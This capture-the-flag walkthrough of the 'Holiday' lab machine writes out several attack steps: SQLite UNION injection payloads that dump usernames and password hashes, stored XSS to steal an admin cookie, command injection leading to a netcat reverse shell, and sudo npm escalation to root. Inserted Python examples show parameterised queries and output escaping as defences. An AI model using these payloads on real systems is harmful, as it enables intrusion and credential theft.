Holiday
As always, we start with the enumeration phase, scanning the machine for open ports and identifying the services and versions running behind them.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.25 -oN allPorts
-sS: TCP SYN scan. This scan type is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online (skip host discovery).
-n: scan without reverse DNS resolution.
-oN: save the scan result to a file, in this case the allPorts file.
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:
nmap -sC -sV -p22,8000 10.10.10.25 -oN targeted
-sC: run the default set of nmap scripts.
-sV: enable version detection.
-oN: save the scan result to a file, in this case the targeted file.
The website shows a simple image.
Let's use dirsearch to enumerate subdirectories.
dirsearch -u http://10.10.10.25:8000/
There is one login page.
Try to log in with the username and password test, and intercept the request with BurpSuite.
It looks like the site is vulnerable to SQL injection, because if we add the " character to the username, the site crashes.
The following payload shows that it is an SQLite 3.15.0 database.
username=admin")) union select 1,sqlite_version(),3,4-- -&password=test
The database has four tables.
username=admin")) union select 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -&password=test
The users table has one column called username and another one called password.
username=admin")) union select 1,group_concat(sql),3,4 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'-- -&password=test
There is one user called RickA.
username=admin")) union select 1,group_concat(username),3,4 FROM users-- -&password=test
We can get his password hash.
username=admin")) union select 1,group_concat(password),3,4 FROM users-- -&password=test
We can get the password from the hash using crackstation.
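Added example, not code from the writeup: a constructed SQLite login in Python shows why the admin")) payloads above work and how a parameterised query stops them. The table layout, the placeholder hash and the shape of the login query are assumptions; the constructed query uses single quotes, so the page's ")) prefix becomes ')) here.

```python
import sqlite3

# The page's two payloads, with the quote changed to match the constructed query below.
VERSION_PAYLOAD = "admin')) union select 1,sqlite_version(),3,4-- -"
USERS_PAYLOAD = "admin')) union select 1,group_concat(username),3,4 FROM users-- -"


def make_db():
    """Constructed stand-in for the site's database: four columns, one user (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'RickA', 'constructed-hash', 'user')")
    return con


def login_vulnerable(con, username, password):
    """String-built query (assumed shape). The payload's ')) closes the two parentheses
    and the trailing '-- -' comments out the password check, so the UNION runs."""
    sql = ("SELECT * FROM users WHERE ((username = '%s')) AND password = '%s'"
           % (username, password))
    return con.execute(sql).fetchall()


def login_safe(con, username, password):
    """Same query with bound parameters: the payload is compared as a literal username."""
    sql = "SELECT * FROM users WHERE ((username = ?)) AND password = ?"
    return con.execute(sql, (username, password)).fetchall()


def demo():
    """Run both versions against both payloads and return what each gives back."""
    con = make_db()
    return {
        "vuln_version": login_vulnerable(con, VERSION_PAYLOAD, "test")[0][1],
        "vuln_users": login_vulnerable(con, USERS_PAYLOAD, "test")[0][1],
        "safe_version": login_safe(con, VERSION_PAYLOAD, "test"),
        "safe_real_user": len(login_safe(con, "RickA", "constructed-hash")),
        "library_version": sqlite3.sqlite_version,
    }


if __name__ == "__main__":
    print(demo())
```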
Using the found credentials, we'll be able to access the site and see a list of bookings.
Each booking has a Notes section where we can submit notes that an administrator will approve.
Let's try to add an img HTML tag with a python server as the source.
python -m http.server 80
After a minute we'll see a request on our HTTP server, which means that the site is vulnerable to XSS.
We need to find a way to steal the administrator cookies. If we inject a simple payload such as the following, we'll see that it gets encoded.
<script>alert('XSS')</script>
I found a way to bypass this restriction. First, create the pwn.js file with the following code.
nano pwn.js
Then, set a netcat listener on port 8000.
nc -lvnp 8000
Now, we need to submit a payload which will be encoded by the encoder.py script.
nano encoder.py
Run the python script to get the final payload.
python encoder.py
Submit the payload as a note.
On port 8000 we'll get the content of the booking page as seen by the administrator.
Using a URL decoder, we'll see the administrator cookie.
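Added example, not from the writeup: the notes feature let an img tag through while encoding a script tag, which is what a tag denylist does. The Python below contrasts that kind of filter with full HTML escaping, and adds the HttpOnly check that would have kept the session cookie out of the injected script. The filter's exact rules and the listener hostname are assumptions.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed notes standing in for what the page submitted: an img tag pointing at a
# listener (hostname is a placeholder) and the script tag the site encoded.
IMG_NOTE = '<img src="http://listener.example/">'
SCRIPT_NOTE = "<script>alert('XSS')</script>"


def render_note_denylist(note):
    """Filter of the kind the page's behaviour suggests (assumption): only <script>
    tags are encoded, so any other element reaches the administrator's browser."""
    return re.sub(r"</?script[^>]*>", lambda m: html.escape(m.group(0)), note,
                  flags=re.IGNORECASE)


def render_note_escaped(note):
    """Context-correct fix: HTML-escape the whole note, so no typed text becomes markup."""
    return html.escape(note, quote=True)


def emits_markup(rendered):
    """True when the rendered note still contains a tag opener."""
    return "<" in rendered


def session_cookie_header(value):
    """Second layer: HttpOnly keeps the session cookie out of document.cookie, so a
    script that does run cannot read it the way the page's payload did."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")


def cookie_readable_by_script(set_cookie_header):
    """Check to run against a live response: a session cookie without HttpOnly is exposed."""
    attrs = [p.strip().lower() for p in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    print(render_note_denylist(IMG_NOTE), render_note_escaped(IMG_NOTE))
    print(session_cookie_header("constructed-session-value"))
```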
By changing our cookie to the administrator one, we'll see one more section called Admin.
There was one directory called /admin; let's check it out.
Click on Bookings, and intercept the request with BurpSuite.
If we try to inject a " character, we'll see that there is a whitelist of allowed characters.
One of the allowed characters is &. If we URL encode it and inject a command after it, we'll see that the command gets executed.
Time to get a shell. First, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP addresses, no DNS resolution.
-p: the port to listen on.
There is one problem. We can't send the reverse shell directly from the request, because we can't specify an IP address: the . character is not allowed. But we can specify the IP address in hexadecimal. Use python to get the hexadecimal values.
python
The final string will be 0x0a0a0e08. Now, create the following file where the HTTP server is located.
nano shell
Now, download the file from the server.
Finally, run the script to get access to the server as algernon. Then we'll be able to grab the user flag.
If we check the sudo permissions, we'll see that we can run npm as root.
sudo -l
There is one way to get a shell as root with this permission. First, run these two commands.
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
Finally, run npm with root permissions, and then all we have to do is reap the harvest and take the root flag.
sudo /usr/bin/npm i -C $TF --unsafe-perm